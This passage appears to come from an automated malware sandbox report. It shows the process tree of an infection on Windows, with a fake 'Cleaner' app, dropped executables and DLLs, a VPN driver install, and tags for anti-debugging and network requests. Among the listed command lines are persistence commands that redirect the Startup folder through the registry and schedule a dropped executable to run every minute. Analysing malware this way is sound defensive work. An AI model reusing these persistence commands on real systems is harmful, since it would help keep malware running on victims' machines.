                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1512,17493402186688487256,10734524978746905717,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6952_1835004437" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2556 /prefetch:1
                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                          • Checks computer location settings
                                                                                                                                                                                                                                                                                                                                          PID:9572
                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1512,17493402186688487256,10734524978746905717,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6952_1835004437" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2540 /prefetch:1
                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                          • Checks computer location settings
                                                                                                                                                                                                                                                                                                                                          PID:9556
                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1512,17493402186688487256,10734524978746905717,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6952_1835004437" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3232 /prefetch:2
                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                            PID:9512
                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1512,17493402186688487256,10734524978746905717,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6952_1835004437" --mojo-platform-channel-handle=1804 /prefetch:8
                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                              PID:6976
                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1512,17493402186688487256,10734524978746905717,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6952_1835004437" --mojo-platform-channel-handle=3544 /prefetch:8
                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                PID:3884
                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1512,17493402186688487256,10734524978746905717,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6952_1835004437" --mojo-platform-channel-handle=3784 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                  PID:9512
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1512,17493402186688487256,10734524978746905717,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6952_1835004437" --mojo-platform-channel-handle=3032 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                    PID:1752
                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1512,17493402186688487256,10734524978746905717,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6952_1835004437" --mojo-platform-channel-handle=2652 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                      PID:4616
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_8526.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"
                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                  • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                                                                                  PID:6104
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                              • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                              PID:8960
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                              • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                                              PID:8988
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                              PID:4820
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                              • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                                                                                                                                              PID:3184
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                              PID:8700
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                PID:5968
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                                                                                                                                              PID:8760
                                                                                                                                                                                                                                                                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                              c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                              PID:8024
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                                                                                                                                                DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{7a3b8e7e-0c5c-3144-b39f-000553280453}\oemvista.inf" "9" "4d14a44ff" "0000000000000164" "WinSta0\Default" "0000000000000170" "208" "c:\program files (x86)\maskvpn\driver\win764"
                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                  PID:8568
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                                                                                                                                                  DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000164"
                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                    PID:7024
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                    PID:7128
                                                                                                                                                                                                                                                                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                                                                    PID:5940
                                                                                                                                                                                                                                                                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                      PID:9052
                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                      PID:4376
                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                        PID:676
                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                      PID:5676
                                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                                                                                                                                                                                      "C:\Program Files (x86)\MaskVPN\mask_svc.exe"
                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                                      PID:3956
                                                                                                                                                                                                                                                                                                                                                      • C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
                                                                                                                                                                                                                                                                                                                                                        MaskVPNUpdate.exe /silent
                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                        PID:8444
                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\5A14.exe
                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\5A14.exe
                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                                                                      PID:6508
                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                      PID:8512
                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\8348.exe
                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\8348.exe
                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                        PID:5320
                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe"
                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                            PID:7300
                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\bd1299733e\
                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                PID:4716
                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                  REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\bd1299733e\
                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:5680
                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rnyuf.exe /TR "C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe" /F
                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                  PID:8528
                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\C4E6.exe
                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\C4E6.exe
                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                                                                              • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                                                                              PID:5816
                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                              PID:5728
                                                                                                                                                                                                                                                                                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                              c:\windows\system32\svchost.exe -k localservice -s LicenseManager
                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                              PID:5568
                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                PID:8680
                                                                                                                                                                                                                                                                                                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                                                                                                                                                                                                                PID:8156
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                PID:3728
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:32
                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                  PID:8800
                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                  PID:5000
                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                  PID:4844
                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\DllHost.exe /Processid:{7966B4D8-4FDC-4126-A10B-39A3209AD251}
                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:1324
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                    PID:7380
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                                                                    PID:7636
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                    PID:6440
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                    PID:4812
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:7348
                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                      PID:7416
                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                      PID:4396
                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                      PID:9324

                                                                                                                                                                                                                                                                                                                                                                    Network

                                                                                                                                                                                                                                                                                                                                                                    MITRE ATT&CK Matrix ATT&CK v6
